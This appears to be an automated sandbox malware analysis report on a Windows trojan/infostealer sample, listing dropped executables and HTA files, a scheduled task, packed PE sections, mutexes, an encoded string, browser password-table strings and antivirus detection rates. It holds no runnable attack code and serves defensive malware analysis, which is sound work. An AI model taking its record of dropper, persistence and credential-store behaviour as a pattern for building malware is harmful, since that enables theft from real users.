memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_a4987715-f

Creates HTA files

Source: C:\Users\user\AppData\Local\Temp\1085378101\9db7f37142.exe	File created: C:\Users\user\AppData\Local\Temp\UgD7WgJAg.hta
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Temp\nRyLXHovP.hta
Source: C:\Users\user\AppData\Local\Temp\1085378101\9db7f37142.exe	File created: C:\Users\user\AppData\Local\Temp\qBrryFCFZ.hta

PE file contains section with special chars

Source: hHtR1O06GH.exe	Static PE information: section name:
Source: hHtR1O06GH.exe	Static PE information: section name: .idata
Source: hHtR1O06GH.exe	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: .idata
Source: skotes.exe.0.dr	Static PE information: section name:
Source: m5UP2Yj[1].exe.4.dr	Static PE information: section name:
Source: m5UP2Yj[1].exe.4.dr	Static PE information: section name: .idata
Source: m5UP2Yj[1].exe.4.dr	Static PE information: section name:
Source: m5UP2Yj.exe.4.dr	Static PE information: section name:
Source: m5UP2Yj.exe.4.dr	Static PE information: section name: .idata
Source: m5UP2Yj.exe.4.dr	Static PE information: section name:
Source: d2YQIJa[1].exe.4.dr	Static PE information: section name:
Source: d2YQIJa[1].exe.4.dr	Static PE information: section name: .idata
Source: d2YQIJa[1].exe.4.dr	Static PE information: section name:
Source: d2YQIJa.exe.4.dr	Static PE information: section name:
Source: d2YQIJa.exe.4.dr	Static PE information: section name: .idata
Source: d2YQIJa.exe.4.dr	Static PE information: section name:
Source: random[1].exe0.4.dr	Static PE information: section name:
Source: random[1].exe0.4.dr	Static PE information: section name: .idata
Source: random[1].exe0.4.dr	Static PE information: section name:
Source: 7b63166ddf.exe.4.dr	Static PE information: section name:
Source: 7b63166ddf.exe.4.dr	Static PE information: section name: .idata
Source: 7b63166ddf.exe.4.dr	Static PE information: section name:
Source: TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE.32.dr	Static PE information: section name:
Source: TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE.32.dr	Static PE information: section name: .idata
Source: TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE.32.dr	Static PE information: section name:
Source: TempHLP0OZ88YBEHH5W0RICPGVIH3THMV5N1.EXE.62.dr	Static PE information: section name:
Source: TempHLP0OZ88YBEHH5W0RICPGVIH3THMV5N1.EXE.62.dr	Static PE information: section name: .idata
Source: TempHLP0OZ88YBEHH5W0RICPGVIH3THMV5N1.EXE.62.dr	Static PE information: section name:

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\TempHLP0OZ88YBEHH5W0RICPGVIH3THMV5N1.EXE			Jump to dropped file

Source: C:\Users\user\Desktop\hHtR1O06GH.exe	File created: C:\Windows\Tasks\skotes.job			Jump to behavior
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 4_2_00497049	4_2_00497049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 4_2_00498860	4_2_00498860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 4_2_004978BB	4_2_004978BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 4_2_00492D10	4_2_00492D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 4_2_00454DE0	4_2_00454DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 4_2_004931A8	4_2_004931A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 4_2_00454B30	4_2_00454B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 4_2_00487F36	4_2_00487F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 4_2_0049779B	4_2_0049779B
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_00419270	9_2_00419270
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_00419A7B	9_2_00419A7B
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_0040BA00	9_2_0040BA00
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_004262F0	9_2_004262F0
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_0043F340	9_2_0043F340
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_00444B3B	9_2_00444B3B
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_00416420	9_2_00416420
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_0042CC20	9_2_0042CC20
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_00433C29	9_2_00433C29
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_00412517	9_2_00412517
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_00442660	9_2_00442660
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_0040EE00	9_2_0040EE00
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_00446610	9_2_00446610
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_00429EE0	9_2_00429EE0
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_0043F740	9_2_0043F740
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_004447CB	9_2_004447CB
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_00446FE0	9_2_00446FE0
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_00401040	9_2_00401040
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_0042C070	9_2_0042C070
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_0043D80D	9_2_0043D80D
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_0042881F	9_2_0042881F
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_00421820	9_2_00421820
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_00415837	9_2_00415837
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_00413080	9_2_00413080
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_0041C0BD	9_2_0041C0BD
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_0040B900	9_2_0040B900
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_004469C0	9_2_004469C0
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_0042D1E1	9_2_0042D1E1
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_0042E98F	9_2_0042E98F
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_0041C1A0	9_2_0041C1A0
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_004389A0	9_2_004389A0
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_0040CA40	9_2_0040CA40
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_0043F250	9_2_0043F250
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_0041CA5C	9_2_0041CA5C
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_0040C270	9_2_0040C270
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_00408A20	9_2_00408A20
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_00440230	9_2_00440230
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_00435A3F	9_2_00435A3F
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_0042F2F0	9_2_0042F2F0
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_0040A290	9_2_0040A290
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_00402AA0	9_2_00402AA0
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_0043A2AA	9_2_0043A2AA
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_0042F350	9_2_0042F350
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_00446350	9_2_00446350
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_00421B60	9_2_00421B60
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_00445B10	9_2_00445B10
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_00419B23	9_2_00419B23
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_0043EB30	9_2_0043EB30
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_0041333D	9_2_0041333D
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_00440B39	9_2_00440B39
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_00422390	9_2_00422390
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_0043E3AE	9_2_0043E3AE
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_0043ABB0	9_2_0043ABB0
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_0042E47B	9_2_0042E47B
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_00445C00	9_2_00445C00
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_00445C18	9_2_00445C18
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_00445C1A	9_2_00445C1A
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_00446CC0	9_2_00446CC0
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_0042ACD8	9_2_0042ACD8
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_004034A0	9_2_004034A0
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_004364AD	9_2_004364AD
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_004094B0	9_2_004094B0
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_00411545	9_2_00411545
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_00440550	9_2_00440550
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_00432D5C	9_2_00432D5C
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_0043456B	9_2_0043456B
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_00407D00	9_2_00407D00
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_0041D515	9_2_0041D515
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_00421520	9_2_00421520
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_004255D0	9_2_004255D0
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_00422DD4	9_2_00422DD4
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_0042DDE0	9_2_0042DDE0
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_004455E1	9_2_004455E1
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_00432DE9	9_2_00432DE9
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_004385F0	9_2_004385F0
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_0043ED90	9_2_0043ED90
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_00445D90	9_2_00445D90
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_0040C5B0	9_2_0040C5B0
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_00434DB0	9_2_00434DB0
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_00403E40	9_2_00403E40
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_0041DE50	9_2_0041DE50
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_00442E50	9_2_00442E50
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_00423E70	9_2_00423E70
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_0042C676	9_2_0042C676
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_0042067F	9_2_0042067F
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_0043467D	9_2_0043467D
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_0042A610	9_2_0042A610
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_00443E2A	9_2_00443E2A
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_00432D29	9_2_00432D29
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_0042FEC0	9_2_0042FEC0
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_004346E7	9_2_004346E7
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_004376F1	9_2_004376F1
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_00410680	9_2_00410680
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_00426E90	9_2_00426E90
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_00431F50	9_2_00431F50
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_00440760	9_2_00440760
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_00433F68	9_2_00433F68
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_0042EF7C	9_2_0042EF7C
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_0043AF10	9_2_0043AF10
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_00404722	9_2_00404722
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_00406F26	9_2_00406F26
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_00408F30	9_2_00408F30
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_00419FD8	9_2_00419FD8
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_0042CFF0	9_2_0042CFF0
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_00415FA4	9_2_00415FA4

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\jROrnzx[1].exe 291F2EA4AF0020B9D0DCD566E97DD586CB03988AB71272D511F134AC8B1924B7

Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: String function: 0040B280 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: String function: 00419260 appears 110 times

Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4600 -s 840

Source: C:\Windows\SysWOW64\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\SysWOW64\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Source: hHtR1O06GH.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: hHtR1O06GH.exe	Static PE information: Section: bxgyntvf ZLIB complexity 0.9948302048903245
Source: skotes.exe.0.dr	Static PE information: Section: bxgyntvf ZLIB complexity 0.9948302048903245
Source: Ta3ZyUR.exe.4.dr	Static PE information: Section: .iat ZLIB complexity 1.0003314936926606
Source: 7aencsM.exe.4.dr	Static PE information: Section: .iat ZLIB complexity 0.9973135177203065
Source: 7aencsM.exe.4.dr	Static PE information: Section: .iat ZLIB complexity 0.9973135177203065
Source: Ta3ZyUR[1].exe.4.dr	Static PE information: Section: .iat ZLIB complexity 1.0003314936926606
Source: m5UP2Yj[1].exe.4.dr	Static PE information: Section: fjzodoul ZLIB complexity 0.9948894794170673
Source: m5UP2Yj.exe.4.dr	Static PE information: Section: fjzodoul ZLIB complexity 0.9948894794170673
Source: jROrnzx[1].exe.4.dr	Static PE information: Section: .iat ZLIB complexity 1.0003235774253731
Source: jROrnzx[1].exe.4.dr	Static PE information: Section: .iat ZLIB complexity 1.0003235774253731
Source: jROrnzx.exe.4.dr	Static PE information: Section: .iat ZLIB complexity 1.0003235774253731
Source: jROrnzx.exe.4.dr	Static PE information: Section: .iat ZLIB complexity 1.0003235774253731
Source: Ta3ZyUR.exe0.4.dr	Static PE information: Section: .iat ZLIB complexity 1.0003314936926606
Source: 7aencsM[1].exe.4.dr	Static PE information: Section: .iat ZLIB complexity 0.9973135177203065
Source: 7aencsM[1].exe.4.dr	Static PE information: Section: .iat ZLIB complexity 0.9973135177203065
Source: 7aencsM.exe0.4.dr	Static PE information: Section: .iat ZLIB complexity 0.9973135177203065
Source: 7aencsM.exe0.4.dr	Static PE information: Section: .iat ZLIB complexity 0.9973135177203065
Source: d2YQIJa[1].exe.4.dr	Static PE information: Section: cwnawalb ZLIB complexity 0.9940336867502307
Source: d2YQIJa.exe.4.dr	Static PE information: Section: cwnawalb ZLIB complexity 0.9940336867502307
Source: Bjkm5hE[1].exe.4.dr	Static PE information: Section: .iat ZLIB complexity 1.0003235774253731
Source: Bjkm5hE.exe.4.dr	Static PE information: Section: .iat ZLIB complexity 1.0003235774253731
Source: random[1].exe0.4.dr	Static PE information: Section: ZLIB complexity 1.0000760198353293
Source: random[1].exe0.4.dr	Static PE information: Section: evmhwrvh ZLIB complexity 0.9950317122217139
Source: 7b63166ddf.exe.4.dr	Static PE information: Section: ZLIB complexity 1.0000760198353293
Source: 7b63166ddf.exe.4.dr	Static PE information: Section: evmhwrvh ZLIB complexity 0.9950317122217139
Source: TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE.32.dr	Static PE information: Section: oxaitfam ZLIB complexity 0.9943964397089398
Source: TempHLP0OZ88YBEHH5W0RICPGVIH3THMV5N1.EXE.62.dr	Static PE information: Section: oxaitfam ZLIB complexity 0.9943964397089398

Source: d2YQIJa.exe.4.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: d2YQIJa[1].exe.4.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: Ta3ZyUR.exe.4.dr, Program.cs	Base64 encoded string: 'MjRmODU0Njk1YWVlNmQ3NGI2ZDFlZGQ2ZGZkYWY0NTJkMzRlNzMzMTA4NTA0MTA0OTJhZGQzNWFiNTVkZDA0Mw=='
Source: 7aencsM.exe.4.dr, Program.cs	Base64 encoded string: 'MjRmODU0Njk1YWVlNmQ3NGI2ZDFlZGQ2ZGZkYWY0NTJkMzRlNzMzMTA4NTA0MTA0OTJhZGQzNWFiNTVkZDA0Mw=='
Source: Ta3ZyUR[1].exe.4.dr, Program.cs	Base64 encoded string: 'MjRmODU0Njk1YWVlNmQ3NGI2ZDFlZGQ2ZGZkYWY0NTJkMzRlNzMzMTA4NTA0MTA0OTJhZGQzNWFiNTVkZDA0Mw=='
Source: jROrnzx[1].exe.4.dr, Program.cs	Base64 encoded string: 'MjRmODU0Njk1YWVlNmQ3NGI2ZDFlZGQ2ZGZkYWY0NTJkMzRlNzMzMTA4NTA0MTA0OTJhZGQzNWFiNTVkZDA0Mw=='
Source: jROrnzx.exe.4.dr, Program.cs	Base64 encoded string: 'MjRmODU0Njk1YWVlNmQ3NGI2ZDFlZGQ2ZGZkYWY0NTJkMzRlNzMzMTA4NTA0MTA0OTJhZGQzNWFiNTVkZDA0Mw=='
Source: Ta3ZyUR.exe0.4.dr, Program.cs	Base64 encoded string: 'MjRmODU0Njk1YWVlNmQ3NGI2ZDFlZGQ2ZGZkYWY0NTJkMzRlNzMzMTA4NTA0MTA0OTJhZGQzNWFiNTVkZDA0Mw=='
Source: 7aencsM[1].exe.4.dr, Program.cs	Base64 encoded string: 'MjRmODU0Njk1YWVlNmQ3NGI2ZDFlZGQ2ZGZkYWY0NTJkMzRlNzMzMTA4NTA0MTA0OTJhZGQzNWFiNTVkZDA0Mw=='
Source: 7aencsM.exe0.4.dr, Program.cs	Base64 encoded string: 'MjRmODU0Njk1YWVlNmQ3NGI2ZDFlZGQ2ZGZkYWY0NTJkMzRlNzMzMTA4NTA0MTA0OTJhZGQzNWFiNTVkZDA0Mw=='
Source: Bjkm5hE[1].exe.4.dr, Program.cs	Base64 encoded string: 'MjRmODU0Njk1YWVlNmQ3NGI2ZDFlZGQ2ZGZkYWY0NTJkMzRlNzMzMTA4NTA0MTA0OTJhZGQzNWFiNTVkZDA0Mw=='
Source: Bjkm5hE.exe.4.dr, Program.cs	Base64 encoded string: 'MjRmODU0Njk1YWVlNmQ3NGI2ZDFlZGQ2ZGZkYWY0NTJkMzRlNzMzMTA4NTA0MTA0OTJhZGQzNWFiNTVkZDA0Mw=='
Source: 8.2.Ta3ZyUR.exe.3e19550.0.raw.unpack, Program.cs	Base64 encoded string: 'MjRmODU0Njk1YWVlNmQ3NGI2ZDFlZGQ2ZGZkYWY0NTJkMzRlNzMzMTA4NTA0MTA0OTJhZGQzNWFiNTVkZDA0Mw=='
Source: 16.2.jROrnzx.exe.3c09550.0.raw.unpack, Program.cs	Base64 encoded string: 'MjRmODU0Njk1YWVlNmQ3NGI2ZDFlZGQ2ZGZkYWY0NTJkMzRlNzMzMTA4NTA0MTA0OTJhZGQzNWFiNTVkZDA0Mw=='

Source: classification engine

Classification label: mal100.phis.troj.spyw.evad.winEXE@118/130@32/14

Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe

Code function: 9_2_0043F740 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

9_2_0043F740

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\Ta3ZyUR[1].exe

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6280:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5296:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3060:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3128:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5452:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3532:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4712:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3868:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3848:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5376
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1232
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4600
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2696
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5312:120:WilError_03

Source: C:\Users\user\Desktop\hHtR1O06GH.exe

File created: C:\Users\user\AppData\Local\Temp\abc3bc1985

Jump to behavior

Source: C:\Users\user\Desktop\hHtR1O06GH.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\hHtR1O06GH.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: chrome.exe, 00000022.00000002.2523590244.000078C4028EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: qFqSpAp.exe, 0000000E.00000003.2070352405.0000000003F68000.00000004.00000800.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000003.2086154745.0000000003FE8000.00000004.00000800.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000003.2070082790.0000000003F83000.00000004.00000800.00020000.00000000.sdmp, A62D4C4BBD9FC243.dat.9.dr, sr16890r1.24.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: hHtR1O06GH.exe	Virustotal: Detection: 58%
Source: hHtR1O06GH.exe	ReversingLabs: Detection: 62%

